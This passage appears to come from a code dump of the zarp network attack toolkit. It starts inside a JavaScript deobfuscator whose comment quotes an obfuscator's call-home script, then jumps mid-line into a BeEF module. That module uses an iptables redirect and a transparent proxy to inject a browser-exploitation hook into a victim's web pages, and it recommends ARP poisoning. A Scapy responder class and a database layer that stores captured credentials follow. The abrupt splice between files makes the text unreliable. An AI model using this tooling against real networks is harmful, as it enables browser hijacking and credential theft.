Lielmanis 4 | # 5 | # written by Stefano Sanfilippo 6 | # 7 | # usage: 8 | # 9 | # if detect(some_string): 10 | # unpacked = unpack(some_string) 11 | # 12 | 13 | # CAVEAT by Einar Lielmanis 14 | 15 | # 16 | # You really don't want to obfuscate your scripts there: they're tracking 17 | # your unpackings, your script gets turned into something like this, 18 | # as of 2011-08-26: 19 | # 20 | # var _escape = 'your_script_escaped'; 21 | # var _111 = document.createElement('script'); 22 | # _111.src = 'http://api.www.myobfuscate.com/?getsrc=ok' + 23 | # '&ref=' + encodeURIComponent(document.referrer) + 24 | # '&url=' + encodeURIComponent(document.URL); 25 | # var 000 = document.getElementsByTagName('head')[0]; 26 | # 000.appendChild(_111); 27 | # document.write(unescape(_escape)); 28 | # 29 | 30 | """Deobfuscator for scripts messed up with MyObfuscate.com""" 31 | 32 | import re 33 | import base64 34 | 35 | # Python 2 retrocompatibility 36 | # pylint: disable=F0401 37 | # pylint: disable=E0611 38 | try: 39 | from urllib import unquote 40 | except ImportError: 41 | from urllib.parse import unquote 42 | 43 | from jsbeautifier.unpackers import UnpackingError 44 | 45 | PRIORITY = 1 46 | 47 | CAVEAT = """// 48 | // Unpacker warning: be careful when using myobfuscate.com for your projects: 49 | // scripts obfuscated by the free online version call back home. 50 | // 51 | 52 | """ 53 | 54 | SIGNATURE = (r'["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F' 55 | r'\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65' 56 | r'\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75' 57 | r'\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B' 58 | r'\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78' 59 | r'\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","' 60 | r'\x6C\x65\x6E\x67\x74\x68"]') 61 | 62 | def detect(source): 63 | """Detects MyObfuscate.com packer.""" 64 | return SIGNATURE in source 65 | 66 | def unpack(source): 67 | """Unpacks js code packed with MyObfuscate.com""" 68 | if not detect(source): 69 | return source 70 | payload = unquote(_filter(source)) 71 | match = re.search(r"^var _escape\='" 17 | self.iptable_http = "iptables -t nat -A PREROUTING -p tcp --dport 80 -s {0} -j REDIRECT --to-port 5544" 18 | self.config.update({"hook_path":Zoption(type = "str", 19 | value = None, 20 | required = True, 21 | display = "Path to BeEF hook"), 22 | "hooked_host": Zoption(type = "ip", 23 | value = None, 24 | required = True, 25 | display = "Host to hook") 26 | }) 27 | self.info = """ 28 | BeEF (Browser Exploitation Framework) is a tool used in 29 | the exploitation of browsers. This module serves as a 30 | way to hook any browser without the need for an XSS 31 | or other malicious client-facing vector. Instead, 32 | when an attacker is local to a victim, this module 33 | will inject each page with a hook. 34 | 35 | ARP poisoning the victim is suggested, as traffic from 36 | the victim is required.""" 37 | 38 | def modip_rule(self, enable=True): 39 | """ enables or disables the iptable rule for forwarding traffic locally 40 | """ 41 | if enable: 42 | util.init_app(self.iptable_http.format 43 | (self.config['hooked_host'].value)) 44 | else: 45 | util.init_app(self.iptable_http.replace('-A', '-D').format 46 | (self.config['hooked_host'].value)) 47 | 48 | def initialize(self): 49 | self.hook_script = self.hook_script.format(self.config['hook_path'].value) 50 | self.modip_rule() 51 | 52 | self.running = True 53 | config = proxy.ProxyConfig(transparent_proxy=dict( 54 | resolver = platform.resolver(), 55 | sslports = [443]) 56 | ) 57 | 58 | config.skip_cert_cleanup = True 59 | self.proxy_server = proxy.ProxyServer(config, 5544) 60 | self.hooker = Hooker(self.proxy_server, self.hook_script) 61 | 62 | util.Msg('Firing up BeEF hook...') 63 | thread = Thread(target=self.hooker.run) 64 | thread.start() 65 | 66 | return True 67 | 68 | def shutdown(self): 69 | """ Disable the iptable rule and kill the proxy server 70 | """ 71 | util.Msg("Shutting down BeEF hooks...") 72 | self.modip_rule(False) 73 | self.proxy_server.shutdown() 74 | self.hooker.shutdown() 75 | 76 | def session_view(self): 77 | """ Return the host we're hooking 78 | """ 79 | return self.config['hooked_host'].value 80 | 81 | 82 | class Hooker(controller.Master): 83 | """ Request handler for libmproxy; takes care of our 84 | replaces. 85 | """ 86 | def __init__(self, server, script_hook): 87 | controller.Master.__init__(self, server) 88 | self.script_hook = script_hook 89 | 90 | def run(self): 91 | try: 92 | return controller.Master.run(self) 93 | except: 94 | self.shutdown() 95 | 96 | def handle_response(self, msg): 97 | """ Replace an end tag with the hook; every HTTP page 98 | should have this. 99 | """ 100 | msg.replace("", "{0}".format(self.script_hook)) 101 | msg.replace("", "{0}".format(self.script_hook)) 102 | msg.reply() 103 | -------------------------------------------------------------------------------- /src/lib/scapy/ansmachine.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | ######################## 7 | ## Answering machines ## 8 | ######################## 9 | 10 | from sendrecv import send,sendp,sniff 11 | from config import conf 12 | from error import log_interactive 13 | 14 | class ReferenceAM(type): 15 | def __new__(cls, name, bases, dct): 16 | o = super(ReferenceAM, cls).__new__(cls, name, bases, dct) 17 | if o.function_name: 18 | globals()[o.function_name] = lambda o=o,*args,**kargs: o(*args,**kargs)() 19 | return o 20 | 21 | 22 | class AnsweringMachine(object): 23 | __metaclass__ = ReferenceAM 24 | function_name = "" 25 | filter = None 26 | sniff_options = { "store":0 } 27 | sniff_options_list = [ "store", "iface", "count", "promisc", "filter", "type", "prn" ] 28 | send_options = { "verbose":0 } 29 | send_options_list = ["iface", "inter", "loop", "verbose"] 30 | send_function = staticmethod(send) 31 | 32 | 33 | def __init__(self, **kargs): 34 | self.mode = 0 35 | if self.filter: 36 | kargs.setdefault("filter",self.filter) 37 | kargs.setdefault("prn", self.reply) 38 | self.optam1 = {} 39 | self.optam2 = {} 40 | self.optam0 = {} 41 | doptsend,doptsniff = self.parse_all_options(1, kargs) 42 | self.defoptsend = self.send_options.copy() 43 | self.defoptsend.update(doptsend) 44 | self.defoptsniff = self.sniff_options.copy() 45 | self.defoptsniff.update(doptsniff) 46 | self.optsend,self.optsniff = [{},{}] 47 | 48 | def __getattr__(self, attr): 49 | for d in [self.optam2, self.optam1]: 50 | if attr in d: 51 | return d[attr] 52 | raise AttributeError,attr 53 | 54 | def __setattr__(self, attr, val): 55 | mode = self.__dict__.get("mode",0) 56 | if mode == 0: 57 | self.__dict__[attr] = val 58 | else: 59 | [self.optam1, self.optam2][mode-1][attr] = val 60 | 61 | def parse_options(self): 62 | pass 63 | 64 | def parse_all_options(self, mode, kargs): 65 | sniffopt = {} 66 | sendopt = {} 67 | for k in kargs.keys(): 68 | if k in self.sniff_options_list: 69 | sniffopt[k] = kargs[k] 70 | if k in self.send_options_list: 71 | sendopt[k] = kargs[k] 72 | if k in self.sniff_options_list+self.send_options_list: 73 | del(kargs[k]) 74 | if mode != 2 or kargs: 75 | if mode == 1: 76 | self.optam0 = kargs 77 | elif mode == 2 and kargs: 78 | k = self.optam0.copy() 79 | k.update(kargs) 80 | self.parse_options(**k) 81 | kargs = k 82 | omode = self.__dict__.get("mode",0) 83 | self.__dict__["mode"] = mode 84 | self.parse_options(**kargs) 85 | self.__dict__["mode"] = omode 86 | return sendopt,sniffopt 87 | 88 | def is_request(self, req): 89 | return 1 90 | 91 | def make_reply(self, req): 92 | return req 93 | 94 | def send_reply(self, reply): 95 | self.send_function(reply, **self.optsend) 96 | 97 | def print_reply(self, req, reply): 98 | print "%s ==> %s" % (req.summary(),reply.summary()) 99 | 100 | def reply(self, pkt): 101 | if not self.is_request(pkt): 102 | return 103 | reply = self.make_reply(pkt) 104 | self.send_reply(reply) 105 | if conf.verb >= 0: 106 | self.print_reply(pkt, reply) 107 | 108 | def run(self, *args, **kargs): 109 | log_interactive.warning("run() method deprecated. The intance is now callable") 110 | self(*args,**kargs) 111 | 112 | def __call__(self, *args, **kargs): 113 | optsend,optsniff = self.parse_all_options(2,kargs) 114 | self.optsend=self.defoptsend.copy() 115 | self.optsend.update(optsend) 116 | self.optsniff=self.defoptsniff.copy() 117 | self.optsniff.update(optsniff) 118 | 119 | try: 120 | self.sniff() 121 | except KeyboardInterrupt: 122 | print "Interrupted by user" 123 | 124 | def sniff(self): 125 | sniff(**self.optsniff) 126 | 127 | -------------------------------------------------------------------------------- /src/core/database.py: -------------------------------------------------------------------------------- 1 | import util 2 | import sqlite3 3 | import config 4 | 5 | """ Manages all interactions between zarp and the connected database 6 | """ 7 | 8 | 9 | class Database(object): 10 | def __init__(self): 11 | self.connection = None 12 | 13 | db_type = config.get('db_con') 14 | if db_type == 'sqlite3': 15 | self.connection = sqlite3.connect('config/zarp.db', 16 | check_same_thread=False) 17 | elif db_type == 'pgsql': 18 | util.Error('Postgres is not yet supported.') 19 | elif db_type == 'mysql': 20 | util.Error('mysql is not yet supported') 21 | 22 | def initialize_schema(self): 23 | """ If this is a new db, build it 24 | """ 25 | tmp = insert('create table log(module, time, message)') 26 | if not tmp: 27 | return 28 | 29 | # it didnt fail, create default schema 30 | insert('create table host (mac UNIQUE, ip, hostname);') 31 | insert('create table credentials (username, password, location, ' 32 | 'source_idx, time, FOREIGN KEY(source_idx) REFERENCES host(ROWID));') 33 | 34 | db = None 35 | 36 | 37 | def initialize(): 38 | global db 39 | db = Database() 40 | db.initialize_schema() 41 | 42 | 43 | def fetch(query, parameters=None): 44 | """ Generic fetch query. Returns a list of all results. 45 | 46 | Parameters should be a tuple, or list of tuples. 47 | ie: SELECT ? FROM log; 48 | parameters = ('module',) 49 | """ 50 | global db 51 | try: 52 | cursor = db.connection.cursor() 53 | 54 | if parameters is None: 55 | cursor.execute(query) 56 | else: 57 | cursor.execute(query, parameters) 58 | return cursor.fetchall() 59 | except Exception, e: 60 | print e 61 | return None 62 | 63 | 64 | def insert(query, parameters=None): 65 | """ Generic insert/create/update query against the loaded database. 66 | """ 67 | global db 68 | success = False 69 | try: 70 | cursor = db.connection.cursor() 71 | 72 | if parameters is None: 73 | cursor.execute(query) 74 | else: 75 | cursor.execute(query, parameters) 76 | 77 | db.connection.commit() 78 | success = True 79 | except: 80 | success = False # unique violation/doesnt exist/etc. 81 | return success 82 | 83 | 84 | def shutdown(): 85 | """ Commit any cached queries and close down the connection 86 | """ 87 | global db 88 | if db is not None: 89 | db.connection.commit() 90 | db.connection.close() 91 | 92 | 93 | def _timestamp(): 94 | """ return a formatted timestamp 95 | """ 96 | return util.timestamp() 97 | 98 | 99 | def dblog(msg, module): 100 | """ Insert a log event. Removes a newline. 101 | """ 102 | return insert('INSERT INTO log VALUES (?,?,?)', (module, _timestamp(), 103 | msg.rstrip())) 104 | 105 | 106 | def dbcredentials(username, password, location, source): 107 | """ Insert credentials into the database. If the host is not found, 108 | insert the source into the host table with a null mac/hostname, 109 | which can be updated later. 110 | 111 | Source should be an IP address of the source the credentials were 112 | coming from. 113 | Location is where the credentials were being used at. 114 | """ 115 | source_idx = None 116 | while source_idx is None: 117 | source_idx = fetch('SELECT ROWID FROM host WHERE ip = ?', (source,)) 118 | if len(source_idx) > 0: 119 | source_idx = source_idx[0][0] 120 | else: 121 | dbhost(None, source, None) 122 | source_idx = None 123 | 124 | return insert('INSERT INTO credentials VALUES (?,?,?,?,?)', 125 | (username, password, location, source_idx, _timestamp())) 126 | 127 | def dbhost(mac, ip, hostname): 128 | """ insert basic host information into the database 129 | """ 130 | source_idx = None 131 | while source_idx is None: 132 | source_idx = fetch('SELECT ROWID FROM host WHERE ip = ?', (ip,)) 133 | if len(source_idx) > 0: 134 | # the host is already in the database; update the mac/hostname 135 | insert('UPDATE host SET mac = ?, hostname = ? WHERE ip = ?', 136 | (mac, hostname)) 137 | source_idx = None 138 | else: 139 | source_idx = insert('INSERT INTO host VALUES (?,?,?);', (mac, ip, hostname)) 140 | return source_idx 141 | --------------------------------------------------------------------------------